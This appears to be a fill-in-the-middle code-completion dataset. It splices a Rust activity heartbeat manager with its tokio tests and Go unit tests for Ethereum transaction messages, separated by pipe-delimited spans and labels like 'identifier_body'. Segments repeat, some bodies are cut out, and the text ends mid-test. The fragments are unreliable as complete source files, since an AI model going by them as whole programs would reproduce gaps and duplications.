}
}
}
/// Initiates termination of all heartbeat processors by sending a signal and awaits termination
pub async fn shutdown(mut self) -> Result<(), JoinError> {
self.shutdown_tx
.send(true)
.expect("shutdown channel can't be dropped before shutdown is complete");
for v in self.heartbeat_processors.drain() {
v.1.join_handle.await?;
}
Ok(())
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatProcessor<SG> {
async fn run(mut self) {
// Each processor is initialized with heartbeat payloads, first thing we need to do is send
// it out.
self.record_heartbeat().await;
loop {
sleep(self.delay).await;
select! {
biased;
_ = self.heartbeat_rx.changed() => {
self.record_heartbeat().await;
}
_ = self.shutdown_rx.changed() => {
break;
}
_ = sleep(self.delay) => {
// Timed out while waiting for the next heartbeat. We waited 2 * delay in total,
// where delay is 1/2 of the activity heartbeat timeout. This means that
// activity has either timed out or completed by now.
break;
}
};
}
self.events_tx
.send(LifecycleEvent::CleanupProcessor(self.task_token))
.expect("cleanup requests should not be dropped");
}
async fn record_heartbeat(&mut self) {
let details = self.heartbeat_rx.borrow().clone();
match self
.server_gateway
.record_activity_heartbeat(self.task_token.clone(), details.into_payloads())
.await
{
Ok(RecordActivityTaskHeartbeatResponse { cancel_requested }) => {
if cancel_requested {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
}
// Send cancels for any activity that learns its workflow already finished (which is
// one thing not found implies - other reasons would seem equally valid).
Err(s) if s.code() == tonic::Code::NotFound => |
Err(e) => {
warn!("Error when recording heartbeat: {:?}", e)
}
}
}
}
#[cfg(test)]
mod test {
use super::*;
use crate::pollers::MockServerGatewayApis;
use crate::protos::coresdk::common::Payload;
use crate::protos::temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse;
use std::time::Duration;
/// Ensure that hearbeats that are sent with a small delay are aggregated and sent roughly once
/// every 1/2 of the heartbeat timeout.
#[tokio::test]
async fn process_heartbeats_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..40 {
sleep(Duration::from_millis(10)).await;
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// Ensure that heartbeat can be called from a tight loop without any delays, resulting in two
/// interactions with the server - one immediately and one after 500ms after the delay.
#[tokio::test]
async fn process_tight_loop_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..u8::MAX {
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// This test reports one heartbeat and waits until processor times out and exits then sends another one.
/// Expectation is that new processor should be spawned and heartbeat shouldn't get lost.
#[tokio::test]
async fn report_heartbeat_after_timeout() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
record_heartbeat(&hm, fake_task_token.clone(), 0, Duration::from_millis(100));
sleep(Duration::from_millis(500)).await;
record_heartbeat(&hm, fake_task_token.clone(), 1, Duration::from_millis(100));
hm.shutdown().await;
}
/// Recording new heartbeats after shutdown is not allowed, and will result in error.
#[tokio::test]
async fn record_after_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(0);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
hm.shutdown().await;
match hm.record(
ActivityHeartbeat {
task_token: vec![1, 2, 3],
details: vec![Payload {
// payload doesn't matter in this case, as it shouldn't get sent anyways.
..Default::default()
}],
},
Duration::from_millis(1000),
) {
Ok(_) => {
unreachable!("heartbeat should not be recorded after the shutdown")
}
Err(e) => {
matches!(e, ActivityHeartbeatError::ShuttingDown);
}
}
}
fn record_heartbeat(
hm: &ActivityHeartbeatManagerHandle,
task_token: Vec<u8>,
i: u8,
delay: Duration,
) {
hm.record(
ActivityHeartbeat {
task_token,
details: vec![Payload {
metadata: Default::default(),
data: vec![i],
}],
},
delay,
)
.expect("hearbeat recording should not fail");
}
}
| {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
} | conditional_block |
activity_heartbeat_manager.rs | use crate::task_token::TaskToken;
use crate::{
errors::ActivityHeartbeatError,
protos::{
coresdk::{common, ActivityHeartbeat, PayloadsExt},
temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse,
},
ServerGatewayApis,
};
use std::{
collections::HashMap,
sync::{
atomic::{AtomicBool, Ordering},
Arc,
},
time::{self, Duration},
};
use tokio::{
select,
sync::{
mpsc::{unbounded_channel, UnboundedReceiver, UnboundedSender},
watch::{channel, Receiver, Sender},
Mutex,
},
task::{JoinError, JoinHandle},
time::sleep,
};
pub(crate) struct ActivityHeartbeatManager<SG> {
/// Core will aggregate activity heartbeats for each activity and send them to the server
/// periodically. This map contains sender channel for each activity, identified by the task
/// token, that has an active heartbeat processor.
heartbeat_processors: HashMap<TaskToken, ActivityHeartbeatProcessorHandle>,
events_tx: UnboundedSender<LifecycleEvent>,
events_rx: UnboundedReceiver<LifecycleEvent>,
shutdown_tx: Sender<bool>,
shutdown_rx: Receiver<bool>,
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
/// Used to supply new heartbeat events to the activity heartbeat manager, or to send a shutdown
/// request.
pub(crate) struct ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool,
events: UnboundedSender<LifecycleEvent>,
/// Cancellations that have been received when heartbeating are queued here and can be consumed
/// by [fetch_cancellations]
incoming_cancels: Mutex<UnboundedReceiver<TaskToken>>,
/// Used during `shutdown` to await until all inflight requests are sent.
join_handle: Mutex<Option<JoinHandle<()>>>,
}
/// Used to supply heartbeat details to the heartbeat processor, which periodically sends them to
/// the server.
struct ActivityHeartbeatProcessorHandle {
heartbeat_tx: Sender<Vec<common::Payload>>,
join_handle: JoinHandle<()>,
}
/// Heartbeat processor, that aggregates and periodically sends heartbeat requests for a single
/// activity to the server.
struct ActivityHeartbeatProcessor<SG> {
task_token: TaskToken,
delay: time::Duration,
/// Used to receive heartbeat events.
heartbeat_rx: Receiver<Vec<common::Payload>>,
/// Used to receive shutdown notifications.
shutdown_rx: Receiver<bool>,
/// Used to send CleanupProcessor event at the end of the processor loop.
events_tx: UnboundedSender<LifecycleEvent>,
/// Used to send cancellation notices that we learned about when heartbeating back up to core
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
#[derive(Debug)]
pub enum LifecycleEvent {
Heartbeat(ValidActivityHeartbeat),
CleanupProcessor(TaskToken),
Shutdown,
}
#[derive(Debug)]
pub struct ValidActivityHeartbeat {
pub task_token: TaskToken,
pub details: Vec<common::Payload>,
pub delay: time::Duration,
}
/// Handle that is used by the core for all interactions with the manager, allows sending new
/// heartbeats or requesting and awaiting for the shutdown. When shutdown is requested, signal gets
/// sent to all processors, which allows them to complete gracefully.
impl ActivityHeartbeatManagerHandle {
/// Records a new heartbeat, note that first call would result in an immediate call to the
/// server, while rapid successive calls would accumulate for up to `delay`
/// and then latest heartbeat details will be sent to the server. If there is no activity for
/// `delay` then heartbeat processor will be reset and process would start
/// over again, meaning that next heartbeat will be sent immediately, creating a new processor.
pub fn record(
&self,
details: ActivityHeartbeat,
delay: Duration,
) -> Result<(), ActivityHeartbeatError> {
if self.shutting_down.load(Ordering::Relaxed) {
return Err(ActivityHeartbeatError::ShuttingDown);
}
self.events
.send(LifecycleEvent::Heartbeat(ValidActivityHeartbeat {
task_token: TaskToken(details.task_token),
details: details.details,
delay,
}))
.expect("Receive half of the heartbeats event channel must not be dropped");
Ok(())
}
/// Returns a future that resolves any time there is a new activity cancel that must be
/// dispatched to lang
pub async fn next_pending_cancel(&self) -> Option<TaskToken> {
self.incoming_cancels.lock().await.recv().await
}
/// Initiates shutdown procedure by stopping lifecycle loop and awaiting for all heartbeat
/// processors to terminate gracefully.
pub async fn shutdown(&self) {
// If shutdown was called multiple times, shutdown signal has been sent already and consumer
// might have been dropped already, meaning that sending to the channel may fail.
// All we need to do is to simply await on handle for the completion.
if !self.shutting_down.load(Ordering::Relaxed) {
self.events
.send(LifecycleEvent::Shutdown)
.expect("should be able to send shutdown event");
self.shutting_down.store(true, Ordering::Relaxed);
}
let mut handle = self.join_handle.lock().await;
if let Some(h) = handle.take() {
h.await.expect("shutdown should exit cleanly");
}
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatManager<SG> {
#![allow(clippy::new_ret_no_self)]
/// Creates a new instance of an activity heartbeat manager and returns a handle to the user,
/// which allows to send new heartbeats and initiate the shutdown.
pub fn new(sg: Arc<SG>) -> ActivityHeartbeatManagerHandle {
let (shutdown_tx, shutdown_rx) = channel(false);
let (events_tx, events_rx) = unbounded_channel();
let (cancels_tx, cancels_rx) = unbounded_channel();
let s = Self {
heartbeat_processors: Default::default(),
events_tx: events_tx.clone(),
events_rx,
shutdown_tx,
shutdown_rx,
cancels_tx,
server_gateway: sg,
};
let join_handle = tokio::spawn(s.lifecycle());
ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool::new(false),
events: events_tx,
incoming_cancels: Mutex::new(cancels_rx),
join_handle: Mutex::new(Some(join_handle)),
}
}
/// Main loop, that handles all heartbeat requests and dispatches them to processors.
async fn lifecycle(mut self) {
while let Some(event) = self.events_rx.recv().await {
match event {
LifecycleEvent::Heartbeat(heartbeat) => self.record(heartbeat),
LifecycleEvent::Shutdown => break,
LifecycleEvent::CleanupProcessor(task_token) => {
self.heartbeat_processors.remove(&task_token);
}
}
}
self.shutdown().await.expect("shutdown should exit cleanly")
}
/// Records heartbeat, by sending it to the processor.
/// New processor is created if one doesn't exist, otherwise new event is dispatched to the
/// existing processor's receiver channel.
fn | (&mut self, heartbeat: ValidActivityHeartbeat) {
match self.heartbeat_processors.get(&heartbeat.task_token) {
Some(handle) => {
handle
.heartbeat_tx
.send(heartbeat.details)
.expect("heartbeat channel can't be dropped if we are inside this method");
}
None => {
let (heartbeat_tx, heartbeat_rx) = channel(heartbeat.details);
let processor = ActivityHeartbeatProcessor {
task_token: heartbeat.task_token.clone(),
delay: heartbeat.delay,
heartbeat_rx,
shutdown_rx: self.shutdown_rx.clone(),
events_tx: self.events_tx.clone(),
cancels_tx: self.cancels_tx.clone(),
server_gateway: self.server_gateway.clone(),
};
let join_handle = tokio::spawn(processor.run());
let handle = ActivityHeartbeatProcessorHandle {
heartbeat_tx,
join_handle,
};
self.heartbeat_processors
.insert(heartbeat.task_token, handle);
}
}
}
/// Initiates termination of all heartbeat processors by sending a signal and awaits termination
pub async fn shutdown(mut self) -> Result<(), JoinError> {
self.shutdown_tx
.send(true)
.expect("shutdown channel can't be dropped before shutdown is complete");
for v in self.heartbeat_processors.drain() {
v.1.join_handle.await?;
}
Ok(())
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatProcessor<SG> {
async fn run(mut self) {
// Each processor is initialized with heartbeat payloads, first thing we need to do is send
// it out.
self.record_heartbeat().await;
loop {
sleep(self.delay).await;
select! {
biased;
_ = self.heartbeat_rx.changed() => {
self.record_heartbeat().await;
}
_ = self.shutdown_rx.changed() => {
break;
}
_ = sleep(self.delay) => {
// Timed out while waiting for the next heartbeat. We waited 2 * delay in total,
// where delay is 1/2 of the activity heartbeat timeout. This means that
// activity has either timed out or completed by now.
break;
}
};
}
self.events_tx
.send(LifecycleEvent::CleanupProcessor(self.task_token))
.expect("cleanup requests should not be dropped");
}
async fn record_heartbeat(&mut self) {
let details = self.heartbeat_rx.borrow().clone();
match self
.server_gateway
.record_activity_heartbeat(self.task_token.clone(), details.into_payloads())
.await
{
Ok(RecordActivityTaskHeartbeatResponse { cancel_requested }) => {
if cancel_requested {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
}
// Send cancels for any activity that learns its workflow already finished (which is
// one thing not found implies - other reasons would seem equally valid).
Err(s) if s.code() == tonic::Code::NotFound => {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
Err(e) => {
warn!("Error when recording heartbeat: {:?}", e)
}
}
}
}
#[cfg(test)]
mod test {
use super::*;
use crate::pollers::MockServerGatewayApis;
use crate::protos::coresdk::common::Payload;
use crate::protos::temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse;
use std::time::Duration;
/// Ensure that hearbeats that are sent with a small delay are aggregated and sent roughly once
/// every 1/2 of the heartbeat timeout.
#[tokio::test]
async fn process_heartbeats_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..40 {
sleep(Duration::from_millis(10)).await;
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// Ensure that heartbeat can be called from a tight loop without any delays, resulting in two
/// interactions with the server - one immediately and one after 500ms after the delay.
#[tokio::test]
async fn process_tight_loop_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..u8::MAX {
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// This test reports one heartbeat and waits until processor times out and exits then sends another one.
/// Expectation is that new processor should be spawned and heartbeat shouldn't get lost.
#[tokio::test]
async fn report_heartbeat_after_timeout() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
record_heartbeat(&hm, fake_task_token.clone(), 0, Duration::from_millis(100));
sleep(Duration::from_millis(500)).await;
record_heartbeat(&hm, fake_task_token.clone(), 1, Duration::from_millis(100));
hm.shutdown().await;
}
/// Recording new heartbeats after shutdown is not allowed, and will result in error.
#[tokio::test]
async fn record_after_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(0);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
hm.shutdown().await;
match hm.record(
ActivityHeartbeat {
task_token: vec![1, 2, 3],
details: vec![Payload {
// payload doesn't matter in this case, as it shouldn't get sent anyways.
..Default::default()
}],
},
Duration::from_millis(1000),
) {
Ok(_) => {
unreachable!("heartbeat should not be recorded after the shutdown")
}
Err(e) => {
matches!(e, ActivityHeartbeatError::ShuttingDown);
}
}
}
fn record_heartbeat(
hm: &ActivityHeartbeatManagerHandle,
task_token: Vec<u8>,
i: u8,
delay: Duration,
) {
hm.record(
ActivityHeartbeat {
task_token,
details: vec![Payload {
metadata: Default::default(),
data: vec![i],
}],
},
delay,
)
.expect("hearbeat recording should not fail");
}
}
| record | identifier_name |
msg_test.go | package types
import (
"bytes"
"fmt"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/common/math"
"math/big"
"strings"
"testing"
"github.com/stretchr/testify/require"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/okex/exchain/app/crypto/ethsecp256k1"
ethcmn "github.com/ethereum/go-ethereum/common"
ethtypes "github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/rlp"
"github.com/tendermint/tendermint/crypto/secp256k1"
)
func TestMsgEthermint(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
require.NotNil(t, msg)
require.Equal(t, msg.Recipient, &addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthermint)
require.True(t, bytes.Equal(msg.GetSignBytes(), sdk.MustSortJSON(ModuleCdc.MustMarshalJSON(msg))))
require.True(t, msg.GetSigners()[0].Equals(fromAddr))
require.Equal(t, *msg.To(), ethcmn.BytesToAddress(addr.Bytes()))
// clear recipient
msg.Recipient = nil
require.Nil(t, msg.To())
}
func TestMsgEthermintValidation(t *testing.T) {
testCases := []struct {
nonce uint64
to *sdk.AccAddress
amount sdk.Int
gasLimit uint64
gasPrice sdk.Int
payload []byte
expectPass bool
from sdk.AccAddress
}{
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(0), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(-1), gasPrice: sdk.NewInt(100000), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(-1), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthermint(tc.nonce, tc.to, tc.amount, tc.gasLimit, tc.gasPrice, tc.payload, tc.from)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "test: %v", i)
} else {
require.NotNil(t, msg.ValidateBasic(), "test: %v", i)
}
}
}
func TestMsgEthermintEncodingAndDecoding(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
raw, err := ModuleCdc.MarshalBinaryBare(msg)
require.NoError(t, err)
var msg2 MsgEthermint
err = ModuleCdc.UnmarshalBinaryBare(raw, &msg2)
require.NoError(t, err)
require.Equal(t, msg.AccountNonce, msg2.AccountNonce)
require.Equal(t, msg.Recipient, msg2.Recipient)
require.Equal(t, msg.Amount, msg2.Amount)
require.Equal(t, msg.GasLimit, msg2.GasLimit)
require.Equal(t, msg.Price, msg2.Price)
require.Equal(t, msg.Payload, msg2.Payload)
require.Equal(t, msg.From, msg2.From)
}
func newSdkAddress() sdk.AccAddress {
tmpKey := secp256k1.GenPrivKey().PubKey()
return sdk.AccAddress(tmpKey.Address().Bytes())
}
func TestMsgEthereumTx(t *testing.T) {
addr := GenerateEthAddress()
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Equal(t, *msg.Data.Recipient, addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthereumTx)
require.NotNil(t, msg.To())
require.Equal(t, msg.GetMsgs(), []sdk.Msg{msg})
require.Panics(t, func() { msg.GetSigners() })
require.Panics(t, func() { msg.GetSignBytes() })
msg = NewMsgEthereumTxContract(0, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Nil(t, msg.Data.Recipient)
require.Nil(t, msg.To())
}
func TestMsgEthereumTxValidation(t *testing.T) {
testCases := []struct {
msg string
amount *big.Int
gasPrice *big.Int
expectPass bool
}{
{msg: "pass", amount: big.NewInt(100), gasPrice: big.NewInt(100000), expectPass: true},
{msg: "invalid amount", amount: big.NewInt(-1), gasPrice: big.NewInt(100000), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(-1), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthereumTx(0, nil, tc.amount, 0, tc.gasPrice, nil)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "valid test %d failed: %s", i, tc.msg)
} else {
require.NotNil(t, msg.ValidateBasic(), "invalid test %d passed: %s", i, tc.msg)
}
}
}
func TestMsgEthereumTxRLPSignBytes(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
chainID := big.NewInt(3)
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
hash := msg.RLPSignBytes(chainID)
require.Equal(t, "5BD30E35AD27449390B14C91E6BCFDCAADF8FE44EF33680E3BC200FC0DC083C7", fmt.Sprintf("%X", hash))
}
func TestMsgEthereumTxRLPEncode(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
raw, err := rlp.EncodeToBytes(&msg)
require.NoError(t, err)
require.Equal(t, ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080"), raw)
}
func TestMsgEthereumTxRLPDecode(t *testing.T) {
var msg MsgEthereumTx
raw := ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080")
addr := ethcmn.BytesToAddress([]byte("test_address"))
expectedMsg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := rlp.Decode(bytes.NewReader(raw), &msg)
require.NoError(t, err)
require.Equal(t, expectedMsg.Data, msg.Data)
// value size exceeds available input length of stream
mockStream := rlp.NewStream(bytes.NewReader(raw), 1)
require.Error(t, msg.DecodeRLP(mockStream))
}
func TestMsgEthereumTxSig(t *testing.T) |
func TestMsgEthereumTx_ChainID(t *testing.T) {
chainID := big.NewInt(3)
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := msg.Sign(chainID, priv.ToECDSA())
require.Nil(t, err)
require.True(t, chainID.Cmp(msg.ChainID()) == 0)
msg.Data.V = big.NewInt(27)
require.NotNil(t, msg.ChainID())
msg.Data.V = math.MaxBig256
expectedChainID := new(big.Int).Div(new(big.Int).Sub(math.MaxBig256, big.NewInt(35)), big.NewInt(2))
require.True(t, expectedChainID.Cmp(msg.ChainID()) == 0)
}
func TestMsgEthereumTxGetter(t *testing.T) {
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
amount, gasPrice, gasLimit := int64(1024), int64(2048), uint64(100000)
expectedFee := gasPrice * int64(gasLimit)
expectCost := expectedFee + amount
msg := NewMsgEthereumTx(0, &addr, big.NewInt(amount), gasLimit, big.NewInt(gasPrice), []byte("test"))
require.Equal(t, gasLimit, msg.GetGas())
require.True(t, big.NewInt(expectedFee).Cmp(msg.Fee()) == 0)
require.True(t, big.NewInt(expectCost).Cmp(msg.Cost()) == 0)
expectedV, expectedR, expectedS := big.NewInt(1), big.NewInt(2), big.NewInt(3)
msg.Data.V, msg.Data.R, msg.Data.S = expectedV, expectedR, expectedS
v, r, s := msg.RawSignatureValues()
require.True(t, expectedV.Cmp(v) == 0)
require.True(t, expectedR.Cmp(r) == 0)
require.True(t, expectedS.Cmp(s) == 0)
}
func TestMarshalAndUnmarshalLogs(t *testing.T) {
var cdc = codec.New()
logs := []*ethtypes.Log{
{
Address: ethcmn.BytesToAddress([]byte{0x11}),
TxHash: ethcmn.HexToHash("0x01"),
// May need to find workaround since Topics is required to unmarshal from JSON
Topics: []ethcmn.Hash{},
Removed: true,
},
{Address: ethcmn.BytesToAddress([]byte{0x01, 0x11}), Topics: []ethcmn.Hash{}},
}
raw, err := codec.MarshalJSONIndent(cdc, logs)
require.NoError(t, err)
var logs2 []*ethtypes.Log
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
require.Len(t, logs2, 2)
require.Equal(t, logs[0].Address, logs2[0].Address)
require.Equal(t, logs[0].TxHash, logs2[0].TxHash)
require.True(t, logs[0].Removed)
emptyLogs := []*ethtypes.Log{}
raw, err = codec.MarshalJSONIndent(cdc, emptyLogs)
require.NoError(t, err)
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
}
func TestMsgString(t *testing.T) {
expectedUint64, expectedSDKAddr, expectedInt := uint64(1024), newSdkAddress(), sdk.OneInt()
expectedPayload, err := hexutil.Decode("0x1234567890abcdef")
require.NoError(t, err)
expectedOutput := fmt.Sprintf("nonce=1024 gasPrice=1 gasLimit=1024 recipient=%s amount=1 data=0x1234567890abcdef from=%s",
expectedSDKAddr, expectedSDKAddr)
msgEthermint := NewMsgEthermint(expectedUint64, &expectedSDKAddr, expectedInt, expectedUint64, expectedInt, expectedPayload, expectedSDKAddr)
require.True(t, strings.EqualFold(msgEthermint.String(), expectedOutput))
expectedHexAddr := ethcmn.BytesToAddress([]byte{0x01})
expectedBigInt := big.NewInt(1024)
expectedOutput = fmt.Sprintf("nonce=1024 price=1024 gasLimit=1024 recipient=%s amount=1024 data=0x1234567890abcdef v=0 r=0 s=0", expectedHexAddr.Hex())
msgEthereumTx := NewMsgEthereumTx(expectedUint64, &expectedHexAddr, expectedBigInt, expectedUint64, expectedBigInt, expectedPayload)
require.True(t, strings.EqualFold(msgEthereumTx.String(), expectedOutput))
}
| {
chainID, zeroChainID := big.NewInt(3), big.NewInt(0)
priv1, _ := ethsecp256k1.GenerateKey()
priv2, _ := ethsecp256k1.GenerateKey()
addr1 := ethcmn.BytesToAddress(priv1.PubKey().Address().Bytes())
trimed := strings.TrimPrefix(addr1.Hex(), "0x")
fmt.Printf("%s\n", trimed)
addrSDKAddr1, err := sdk.AccAddressFromHex(trimed)
require.NoError(t, err)
addr2 := ethcmn.BytesToAddress(priv2.PubKey().Address().Bytes())
// require valid signature passes validation
msg := NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err := msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
require.NotEqual(t, addr2, signer)
// msg atomic load
signer, err = msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
signers := msg.GetSigners()
require.Equal(t, 1, len(signers))
require.True(t, addrSDKAddr1.Equals(signers[0]))
// zero chainID
err = msg.Sign(zeroChainID, priv1.ToECDSA())
require.Nil(t, err)
_, err = msg.VerifySig(zeroChainID)
require.Nil(t, err)
// require invalid chain ID fail validation
msg = NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err = msg.VerifySig(big.NewInt(4))
require.Error(t, err)
require.Equal(t, ethcmn.Address{}, signer)
} | identifier_body |
msg_test.go | package types
import (
"bytes"
"fmt"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/common/math"
"math/big"
"strings"
"testing"
"github.com/stretchr/testify/require"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/okex/exchain/app/crypto/ethsecp256k1"
ethcmn "github.com/ethereum/go-ethereum/common"
ethtypes "github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/rlp"
"github.com/tendermint/tendermint/crypto/secp256k1"
)
func TestMsgEthermint(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
require.NotNil(t, msg)
require.Equal(t, msg.Recipient, &addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthermint)
require.True(t, bytes.Equal(msg.GetSignBytes(), sdk.MustSortJSON(ModuleCdc.MustMarshalJSON(msg))))
require.True(t, msg.GetSigners()[0].Equals(fromAddr))
require.Equal(t, *msg.To(), ethcmn.BytesToAddress(addr.Bytes()))
// clear recipient
msg.Recipient = nil
require.Nil(t, msg.To())
}
func TestMsgEthermintValidation(t *testing.T) {
testCases := []struct {
nonce uint64
to *sdk.AccAddress
amount sdk.Int
gasLimit uint64
gasPrice sdk.Int
payload []byte
expectPass bool
from sdk.AccAddress
}{
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(0), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(-1), gasPrice: sdk.NewInt(100000), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(-1), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthermint(tc.nonce, tc.to, tc.amount, tc.gasLimit, tc.gasPrice, tc.payload, tc.from)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "test: %v", i)
} else {
